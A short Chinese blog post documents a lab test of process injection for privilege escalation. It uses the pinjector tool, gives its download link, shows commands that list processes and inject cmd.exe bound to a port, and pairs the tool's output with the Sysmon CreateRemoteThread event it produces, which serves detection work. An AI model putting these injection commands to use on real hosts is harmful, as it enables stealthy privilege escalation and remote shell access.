进程注入数据采集，sysmon可以获得CreateRemoteThread信息

下载地址：https://www.tarasco.org/security/Process_Injector/processinjector.zip

进程注入（pinjector.exe）提权
进程注入将pinjector注入到用户的进程里一起运行，进而同时拥有了对应的权限。
是一种比较隐蔽的手段，不会创建新的进程，很难发现，但是上传至目标主机时可能会报毒

从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。
放到主机的c盘根目录下

  Pinjector.exe -l 列出进程，列出的所有进程都可以利用（找system对应权限的进程）

 pinjector.exe -p 456 cmd 5959

我自己本机尝试：

D:\bonelee\processinjector\Process Injector>pinjector -p 12304 cmd.exe 6688
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com

[+] Trying to execute cmd.exe to 12304 as: DESKTOP-PTV6LGO \ admin
[+] Code inyected... ; )

使用sysmon采集数据：

CreateRemoteThread detected:
RuleName: -
UtcTime: 2022-04-19 09:57:20.846
SourceProcessGuid: {7f59fefd-8780-625e-c811-000000002700}
SourceProcessId: 3940
SourceImage: D:\bonelee\processinjector\Process Injector\pinjector.exe
TargetProcessGuid: {7f59fefd-333e-625e-6f02-000000002700}
TargetProcessId: 12304
TargetImage: C:\Program Files (x86)\Notepad++\notepad++.exe
NewThreadId: 2224
StartAddress: 0x0000000003900000
StartModule: -
StartFunction: -
SourceUser: DESKTOP-PTV6LGO\admin
TargetUser: DESKTOP-PTV6LGO\admin

标签：CreateRemoteThread,exe,采集,Process,pinjector,DESKTOP,sysmon,Injector,进程
来源： https://www.cnblogs.com/bonelee/p/16167173.html